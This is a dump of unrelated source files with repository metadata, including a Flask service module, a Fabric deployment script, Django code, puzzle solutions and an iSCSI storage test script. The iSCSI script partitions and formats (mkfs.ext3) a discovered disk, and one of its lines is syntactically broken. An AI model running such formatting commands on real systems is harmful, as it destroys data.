print("{} text retrieval operations took {} s".format(self.N, get_text_time))
mispellings_time = timeit.repeat(stmt=self.editor_mispellings,setup=new_editor,repeat=3,number=1)
print("{} mispelling operations took {} s".format(self.N, mispellings_time))
if __name__ == "__main__":
b = EditorBenchmarker(["hello friends"], 20)
b.benchmark()
|
[
"[email protected]"
] | |
6b5be029fd1626d37c9b7f3db3aa07efd58e1011
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_123/627.py
|
28c02feb9a393af2190da5d1cd6130c71872869c
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,171 |
py
|
__author__ = 'jeff'
from collections import deque
base = "A-small-attempt2"
#base = "A1_test"
f = open(base+'.in','r')
fout = open(base+'.out','w')
t = int(f.readline())
def proc( a, motes):
while( len( motes ) and motes[0] < a ):
a += motes.popleft()
return a
max_lev = 100000
for case in range(1,t+1):
[a,n] = f.readline().split(' ')
a=int(a)
n=int(n)
motes = list(map( int, f.readline()[0:-1].split(' ')))
motes.sort()
print(a,motes)
motes = deque( motes )
moves = 0
adds = removes = 0
lev_count = 0
while( len( motes) ):
a=proc(a,motes)
if( not len( motes ) ):
break
a_copy = a
these_adds = 0
while( a>1 and a_copy <= motes[0] ):
these_adds += 1
a_copy += (a_copy - 1)
if( these_adds > 0 and these_adds < len( motes )):
adds += these_adds
a = a_copy
else:
removes += len( motes )
motes = deque([])
moves = moves + adds + removes
out_s = 'Case #{0}: {1}\n'.format(case,moves)
print( out_s )
fout.write(out_s)
f.close()
fout.close()
|
[
"[email protected]"
] | |
459e8127e4b5cb873a598644dc79c3d2708b3db1
|
a9c0a8d815b6453aca945849f3b402f75684bfcb
|
/project/api/services.py
|
95d316eb964a262ab8aa954303e31d09a23b1d26
|
[] |
no_license
|
harrywang/my-flask-tdd-docker
|
4035b666a3366cd059a3a65c68c7c9ad9b637da3
|
362c33e7caa3bf35a62cff71f3c567c5e8de1fd2
|
refs/heads/master
| 2022-04-13T23:12:04.725775 | 2020-03-21T18:14:00 | 2020-03-21T18:14:00 | 248,801,429 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 679 |
py
|
# project/api/services.py
from project import db
from project.api.models import User
def get_all_users():
return User.query.all()
def get_user_by_id(user_id):
return User.query.filter_by(id=user_id).first()
def get_user_by_email(email):
return User.query.filter_by(email=email).first()
def add_user(username, email):
user = User(username=username, email=email)
db.session.add(user)
db.session.commit()
return user
def update_user(user, username, email):
user.username = username
user.email = email
db.session.commit()
return user
def delete_user(user):
db.session.delete(user)
db.session.commit()
return user
|
[
"[email protected]"
] | |
e23633a5a9b66be7ed21624a319c2ac19699c898
|
81a1c5db1f24a7daf4fe51de499e1aea81d8ea05
|
/fabfile.py
|
94155b79ffeb1d48061ee035c7bbca818b7c3f36
|
[] |
no_license
|
Beomi/azure-django-test
|
cf0d1fe323a63d9ba2672b8ebea2fc3e170980ce
|
a811afb62501f2fe245226f9bb94cd51bebc6866
|
refs/heads/master
| 2021-06-19T15:53:18.932591 | 2017-06-08T12:20:34 | 2017-06-08T12:20:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| true | false | 6,241 |
py
|
from fabric.contrib.files import append, exists, sed, put
from fabric.api import env, local, run, sudo
import random
import os
import json
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# deploy.json파일을 불러와 envs변수에 저장합니다.
with open(os.path.join(PROJECT_DIR, "deploy.json")) as f:
envs = json.loads(f.read())
# TODO: Required Fields: REPO_URL, PROJECT_NAME, REMOTE_HOST, REMOTE_PASSWORD, REMOTE_USER, REMOTE_HOST_SSH @ deploy.json
# developer: chagne this!
REPO_URL = envs['REPO_URL']
PROJECT_NAME = envs['PROJECT_NAME']
REMOTE_HOST_SSH = envs['REMOTE_HOST_SSH']
REMOTE_HOST = envs['REMOTE_HOST']
REMOTE_USER = envs['REMOTE_USER']
REMOTE_PASSWORD = envs['REMOTE_PASSWORD']
STATIC_ROOT_NAME = 'static_deploy'
STATIC_URL_NAME = 'static'
MEDIA_ROOT = 'uploads'
# TODO: Server Engineer: you should add env.user as sudo user and NOT be root
env.user = REMOTE_USER
username = env.user
# Option: env.password
env.hosts = [
REMOTE_HOST_SSH,
]
env.password = REMOTE_PASSWORD
project_folder = '/home/{}/{}'.format(env.user, PROJECT_NAME)
apt_requirements = [
'ufw',
'curl',
'git',
'python3-dev',
'python3-pip',
'build-essential',
'python3-setuptools',
'apache2',
'libapache2-mod-wsgi-py3',
'libmysqlclient-dev',
'libssl-dev',
'libxml2-dev',
'libjpeg8-dev',
'zlib1g-dev',
]
def new_server():
setup()
deploy()
def setup():
_get_latest_apt()
_install_apt_requirements(apt_requirements)
_make_virtualenv()
#_ufw_allow()
def deploy():
_get_latest_source()
_put_envs()
_update_settings()
_update_virtualenv()
_update_static_files()
_update_database()
#_ufw_allow()
_make_virtualhost()
_grant_apache2()
_grant_sqlite3()
_restart_apache2()
def _put_envs():
put(os.path.join(PROJECT_DIR, 'envs.json'), '~/{}/envs.json'.format(PROJECT_NAME))
def _get_latest_apt():
update_or_not = input('would you update?: [y/n]')
if update_or_not=='y':
sudo('sudo apt-get update && sudo apt-get -y upgrade')
def _install_apt_requirements(apt_requirements):
reqs = ''
for req in apt_requirements:
reqs += (' ' + req)
sudo('sudo apt-get -y install {}'.format(reqs))
def _make_virtualenv():
if not exists('~/.virtualenvs'):
script = '''"# python virtualenv settings
export WORKON_HOME=~/.virtualenvs
export VIRTUALENVWRAPPER_PYTHON="$(command \which python3)" # location of python3
source /usr/local/bin/virtualenvwrapper.sh"'''
run('mkdir ~/.virtualenvs')
sudo('sudo pip3 install virtualenv virtualenvwrapper')
run('echo {} >> ~/.bashrc'.format(script))
def _get_latest_source():
if exists(project_folder + '/.git'):
run('cd %s && git fetch' % (project_folder,))
else:
run('git clone %s %s' % (REPO_URL, project_folder))
current_commit = local("git log -n 1 --format=%H", capture=True)
run('cd %s && git reset --hard %s' % (project_folder, current_commit))
def _update_settings():
settings_path = project_folder + '/{}/settings.py'.format(PROJECT_NAME)
sed(settings_path, "DEBUG = True", "DEBUG = False")
sed(settings_path,
'ALLOWED_HOSTS = .+$',
'ALLOWED_HOSTS = ["%s"]' % (REMOTE_HOST,)
)
secret_key_file = project_folder + '/{}/secret_key.py'.format(PROJECT_NAME)
if not exists(secret_key_file):
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
key = ''.join(random.SystemRandom().choice(chars) for _ in range(50))
append(secret_key_file, "SECRET_KEY = '%s'" % (key,))
append(settings_path, '\nfrom .secret_key import SECRET_KEY')
def _update_virtualenv():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
if not exists(virtualenv_folder + '/bin/pip'):
run('cd /home/%s/.virtualenvs && virtualenv %s' % (env.user, PROJECT_NAME))
run('%s/bin/pip install -r %s/requirements.txt' % (
virtualenv_folder, project_folder
))
def _update_static_files():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
run('cd %s && %s/bin/python3 manage.py collectstatic --noinput' % (
project_folder, virtualenv_folder
))
def _update_database():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
run('cd %s && %s/bin/python3 manage.py migrate --noinput' % (
project_folder, virtualenv_folder
))
def _ufw_allow():
sudo("ufw allow 'Apache Full'")
sudo("ufw reload")
def _make_virtualhost():
script = """'<VirtualHost *:80>
ServerName {servername}
Alias /{static_url} /home/{username}/{project_name}/{static_root}
Alias /{media_url} /home/{username}/{project_name}/{media_url}
<Directory /home/{username}/{project_name}/{media_url}>
Require all granted
</Directory>
<Directory /home/{username}/{project_name}/{static_root}>
Require all granted
</Directory>
<Directory /home/{username}/{project_name}/{project_name}>
<Files wsgi.py>
Require all granted
</Files>
</Directory>
WSGIDaemonProcess {project_name} python-home=/home/{username}/.virtualenvs/{project_name} python-path=/home/{username}/{project_name}
WSGIProcessGroup {project_name}
WSGIScriptAlias / /home/{username}/{project_name}/{project_name}/wsgi.py
ErrorLog ${{APACHE_LOG_DIR}}/error.log
CustomLog ${{APACHE_LOG_DIR}}/access.log combined
</VirtualHost>'""".format(
static_root=STATIC_ROOT_NAME,
username=env.user,
project_name=PROJECT_NAME,
static_url=STATIC_URL_NAME,
servername=REMOTE_HOST,
media_url=MEDIA_ROOT
)
sudo('echo {} > /etc/apache2/sites-available/{}.conf'.format(script, PROJECT_NAME))
sudo('a2ensite {}.conf'.format(PROJECT_NAME))
def _grant_apache2():
sudo('sudo chown -R :www-data ~/{}'.format(PROJECT_NAME))
def _grant_sqlite3():
sudo('sudo chmod 775 ~/{}/db.sqlite3'.format(PROJECT_NAME))
def _restart_apache2():
sudo('sudo service apache2 restart')
|
[
"[email protected]"
] | |
5edb0c8e55ee71407031f5baea3676bd34bf5368
|
28ae42f6a83fd7c56b2bf51e59250a31e68917ca
|
/tracpro/polls/migrations/0015_issue_region.py
|
ff1c2937af89c2c8ce646673002fd58356fd1f04
|
[
"BSD-3-Clause"
] |
permissive
|
rapidpro/tracpro
|
0c68443d208cb60cbb3b2077977786f7e81ce742
|
a68a782a7ff9bb0ccee85368132d8847c280fea3
|
refs/heads/develop
| 2021-01-19T10:29:48.381533 | 2018-03-13T12:17:11 | 2018-03-13T12:17:11 | 29,589,268 | 5 | 10 |
BSD-3-Clause
| 2018-02-23T14:43:12 | 2015-01-21T12:51:24 |
Python
|
UTF-8
|
Python
| false | false | 575 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groups', '0004_auto_20150123_0909'),
('polls', '0014_remove_response_is_complete'),
]
operations = [
migrations.AddField(
model_name='issue',
name='region',
field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
preserve_default=True,
),
]
|
[
"[email protected]"
] | |
6b10d9a5295db113b96722c8b92c968c83079333
|
ef821468b081ef2a0b81bf08596a2c81e1c1ef1a
|
/Python OOP/Decorators-Exercise/Cache.py
|
3630fbd6868ddb28d50316c5fea622d51b440ae5
|
[] |
no_license
|
Ivaylo-Atanasov93/The-Learning-Process
|
71db22cd79f6d961b9852f140f4285ef7820dd80
|
354844e2c686335345f6a54b3af86b78541ed3f3
|
refs/heads/master
| 2023-03-30T20:59:34.304207 | 2021-03-29T15:23:05 | 2021-03-29T15:23:05 | 294,181,544 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 346 |
py
|
def cache(func):
def wrapper(n):
result = func(n)
wrapper.log[n] = result
return result
wrapper.log = {}
return wrapper
@cache
def fibonacci(n):
if n < 2:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)
fibonacci(4)
print(fibonacci.log)
|
[
"[email protected]"
] | |
b8fac3e471ae450389961aa1cb49b4834ce1d6cb
|
5b565e331073a8b29f997c30b58d383806f7d5a8
|
/pizzeria/11_env/bin/easy_install-3.7
|
242566d7d779997c369a8ea2a01c7db939a5250b
|
[] |
no_license
|
jeongwook/python_work
|
f403d5be9da6744e49dd7aedeb666a64047b248d
|
bba188f47e464060d5c3cd1f245d367da37827ec
|
refs/heads/master
| 2022-04-02T23:16:57.597664 | 2020-01-21T08:29:48 | 2020-01-21T08:29:48 | 227,506,961 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 288 |
7
|
#!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | |
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e
|
f1614f3531701a29a33d90c31ab9dd6211c60c6b
|
/test/menu_sun_integration/handlers/test_status_synchronizer_service.py
|
207c451856241312424ce76fdbb72a3f98062b7d
|
[] |
no_license
|
pfpacheco/menu-sun-api
|
8a1e11543b65db91d606b2f3098847e3cc5f2092
|
9bf2885f219b8f75d39e26fd61bebcaddcd2528b
|
refs/heads/master
| 2022-12-29T13:59:11.644409 | 2020-10-16T03:41:54 | 2020-10-16T03:41:54 | 304,511,679 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,110 |
py
|
import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
@pytest.fixture
def active_responses(self):
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
response = json.load(json_file)
responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
return responses
@responses.activate
def test_fetch_order_status_promax(self, session, active_responses):
seller = bind_seller(IntegrationType.PROMAX)
session.commit()
customer = Customer(document="17252508000180", seller_id=seller.id)
statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
OrderStatusFactory(status=OrderStatusType.APPROVED)]
order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
customer=customer, statuses=statuses)
session.commit()
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
response = json.load(json_file)
active_responses.add(responses.POST,
'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
order_repository = OrderRepository(session=session)
integration_service = OrderIntegrationService(session=session)
status_notification = StatusSynchronizerService(order_repository=order_repository,
integration_service=integration_service)
status_notification.sync_all_pending_orders(
seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
session.commit()
order = order_repository.get_order(
seller_id=seller.id, order_id=order.order_id)
assert (order.status.status == OrderStatusType.CANCELED)
|
[
"[email protected]"
] | |
faf55dcced2172399d37e25d66e39d89868333d0
|
280049c5d363df840e5a2184002e59625f0af61b
|
/datastructure11-balancedparanthesischeck.py
|
26c752c9dfffff64c23a2cf8d5095ae37812d617
|
[] |
no_license
|
deesaw/DataSPython
|
853c1b36f7185752613d6038e706b06fbf25c84e
|
c69a23dff3b3852310f145d1051f2ad1dda6b7b5
|
refs/heads/main
| 2023-02-19T13:36:01.547293 | 2021-01-16T13:15:56 | 2021-01-16T13:15:56 | 330,166,053 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,346 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
# Check is even number of brackets
if len(s)%2 != 0:
return False
# Set of opening brackets
opening = set('([{')
# Matching Pairs
matches = set([ ('(',')'), ('[',']'), ('{','}') ])
# Use a list as a "Stack"
stack = []
# Check every parenthesis in string
for paren in s:
# If its an opening, append it to list
if paren in opening:
stack.append(paren)
else:
# Check that there are parentheses in Stack
if len(stack) == 0:
return False
# Check the last open parenthesis
last_open = stack.pop()
# Check if it has a closing match
if (last_open,paren) not in matches:
return False
return len(stack) == 0
from nose.tools import assert_equal
class TestBalanceCheck(object):
def test(self,sol):
assert_equal(sol('[](){([[[]]])}('),False)
assert_equal(sol('[{{{(())}}}]((()))'),True)
assert_equal(sol('[[[]])]'),False)
print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check)
|
[
"[email protected]"
] | |
adec15e7f10d62c6d1a6c1bca83ce174883b2551
|
69f47a6e77fc2a1363fc8713ed83d36209e7cf32
|
/deframed/default.py
|
997b289bd34920ff3704dc3d241fa7fbc6f6c50e
|
[] |
no_license
|
smurfix/deframed
|
f1c4611c597809b53a138b70665430ed080a989d
|
9c1d4db2991cef55725ac6ecae44af60a96ff4f2
|
refs/heads/master
| 2022-07-20T14:08:35.938667 | 2022-07-14T07:05:43 | 2022-07-14T07:05:43 | 259,882,446 | 24 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,184 |
py
|
"""
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
CFG = attrdict(
logging=attrdict( # a magic incantation
version=1,
loggers=attrdict(
#"asyncari": {"level":"INFO"},
),
root=attrdict(
handlers= ["stderr",],
level="INFO",
),
handlers=attrdict(
logfile={
"class":"logging.FileHandler",
"filename":"/var/log/deframed.log",
"level":"INFO",
"formatter":"std",
},
stderr={
"class":"logging.StreamHandler",
"level":"INFO",
"formatter":"std",
"stream":"ext://sys.stderr",
},
),
formatters=attrdict(
std={
"class":"deframed.util.TimeOnlyFormatter",
"format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
},
),
disable_existing_loggers=False,
),
server=attrdict( # used to setup the hypercorn toy server
host="127.0.0.1",
port=8080,
prio=0,
name="test me",
use_reloader=False,
ca_certs=None,
certfile=None,
keyfile=None,
),
mainpage="templates/layout.mustache",
debug=False,
data=attrdict( # passed to main template
title="Test page. Do not test!",
loc=attrdict(
#msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
#mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
msgpack="https://unpkg.com/@msgpack/msgpack",
mustache="/static/ext/mustache.min.js",
bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
poppler="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js",
jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
),
static="static", # path
),
)
|
[
"[email protected]"
] | |
f794cd1dae5cb4ed8da0fc22286c5a047b86c2fa
|
d8a541a2953c9729311059585bb0fca9003bd6ef
|
/Lists as stack ques/cups_and_bottles.py
|
efc8af013cd606d663a6539b7b98d2807e6c28fc
|
[] |
no_license
|
grigor-stoyanov/PythonAdvanced
|
ef7d628d2b81ff683ed8dd47ee307c41b2276dd4
|
0a6bccc7faf1acaa01979d1e23cfee8ec29745b2
|
refs/heads/main
| 2023-06-10T09:58:04.790197 | 2021-07-03T02:52:20 | 2021-07-03T02:52:20 | 332,509,767 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 604 |
py
|
from collections import deque
cups = deque(map(int, input().split()))
bottles = list(map(int, input().split()))
wasted_water = 0
while cups and bottles:
current_cup = cups.popleft()
while current_cup > 0 and bottles:
current_bottle = bottles.pop()
current_cup -= current_bottle
if current_cup < 0:
wasted_water += -current_cup
if not cups:
print('Bottles: ', end='')
print(*[bottles.pop() for i in range(len(bottles))])
else:
print('Cups: ', end='')
print(*[cups.popleft() for i in range(len(cups))])
print(f'Wasted litters of water: {wasted_water}')
|
[
"[email protected]"
] | |
1c6ff28e26ea56bf58d2d64410f7f7ccc128b1c3
|
a51854991671a4389902945578288da34845f8d9
|
/libs/Utility/__init__.py
|
413df21a5385589d95b5c2ec9bf735a694a5e504
|
[] |
no_license
|
wuyou1102/DFM_B2
|
9210b4b8d47977c50d92ea77791f477fa77e5f83
|
69ace461b9b1b18a2269568110cb324c04ad4266
|
refs/heads/master
| 2020-04-13T18:54:20.045734 | 2019-06-17T12:46:23 | 2019-06-17T12:46:23 | 163,387,873 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 297 |
py
|
# -*- encoding:UTF-8 -*-
from libs.Utility import Logger
import Alert as Alert
import Random as Random
from ThreadManager import append_thread
from ThreadManager import is_alive
from ThreadManager import query_thread
from Common import *
import ParseConfig as ParseConfig
from Serial import Serial
|
[
"[email protected]"
] | |
580dbd15bf43272f28e3f9bd42413a905510cd76
|
bef304291f5fe599f7a5b713d19544dc0cecd914
|
/todoapp/todo_list/forms.py
|
9fe1a617dd0f429fc6c8b3c1fa6885fee975c262
|
[] |
no_license
|
coderj001/django-todo-and-air-quality
|
9ca847143ea86677a0d54026c060638fabf8c042
|
012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3
|
refs/heads/master
| 2020-12-14T20:20:49.845722 | 2020-01-19T15:06:42 | 2020-01-19T15:06:42 | 234,855,834 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 147 |
py
|
from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
class Meta:
model=ToDoList
fields=['item','completed']
|
[
"[email protected]"
] | |
d1877db7913e58c396ec934ebb1dc1c993bcbbb5
|
892dd32ee0be7135cd33c875b06dcc66307dcc99
|
/automation/MPTS/verifyIqn.py
|
b82a09a932deb898ea00bc911d3867e80a4c52da
|
[] |
no_license
|
cloudbytestorage/devops
|
6d21ed0afd752bdde8cefa448d4433b435493ffa
|
b18193b08ba3d6538277ba48253c29d6a96b0b4a
|
refs/heads/master
| 2020-05-29T08:48:34.489204 | 2018-01-03T09:28:53 | 2018-01-03T09:28:53 | 68,889,307 | 4 | 8 | null | 2017-11-30T08:11:39 | 2016-09-22T05:53:44 |
Python
|
UTF-8
|
Python
| false | false | 5,429 |
py
|
import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
#### if login successfull mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
executeCmd('fdisk /dev/%s < fdisk_response_file' (device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
else:
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
|
[
"[email protected]"
] | |
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py
|
18e84ab880631f7510539ae77e9524b0eda2b632
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 621 |
py
|
# represents a triangle
class Triangle(object):
_kinds=["equilateral","isosceles","scalene"]
def __init__(self,a,b,c):
if a<=0 or b<=0 or c<=0:
raise TriangleError("Triangles cannot have zero or negative side length.")
if a+b<=c or a+c<=b or b+c<=a:
raise TriangleError("Triangles must satisfy the triangle inequality.")
self.sides=sorted([a,b,c])
def kind(self):
return Triangle._kinds[len(set(self.sides))-1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
def __init__(self,message):
super(TriangleError,self).__init__(message)
|
[
"[email protected]"
] | |
748f97751e80a2258b78d59ce4a378db9a54d1b5
|
b743a6b89e3e7628963fd06d2928b8d1cdc3243c
|
/bpl_client/Client.py
|
c9143098c648f30df369d458d22b99d0e6d61a3a
|
[
"MIT"
] |
permissive
|
DuneRoot/bpl-cli
|
847248d36449181856e6cf34a18119cd9fc1b045
|
3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28
|
refs/heads/master
| 2020-03-25T17:42:06.339501 | 2019-02-20T19:20:26 | 2019-02-20T19:20:26 | 143,990,801 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,781 |
py
|
"""
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
def __init__(self):
"""
Client Class.
Retrieves options from docopt. Options are then filtered using data stored in commands.json.
Command is then imported and instantiated.
"""
self._options = docopt(__doc__, version=__version__)
self._arguments = {
k: v for k, v in self._options.items()
if not isinstance(v, bool)
}
commands_json = json.loads(read_file(COMMANDS_JSON))
command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
getattr(
import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
command["Class Identifier"]
)(self._arguments).run()
def _is_command(self, conditions):
return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
|
[
"[email protected]"
] | |
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9
|
7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a
|
/examples/adspygoogle/dfp/v201101/get_licas_by_statement.py
|
9086f2f5d7006a77c1a7b578138725bf4db3479b
|
[
"Apache-2.0"
] |
permissive
|
hockeyprincess/google-api-dfp-python
|
534519695ffd26341204eedda7a8b50648f12ea9
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
refs/heads/master
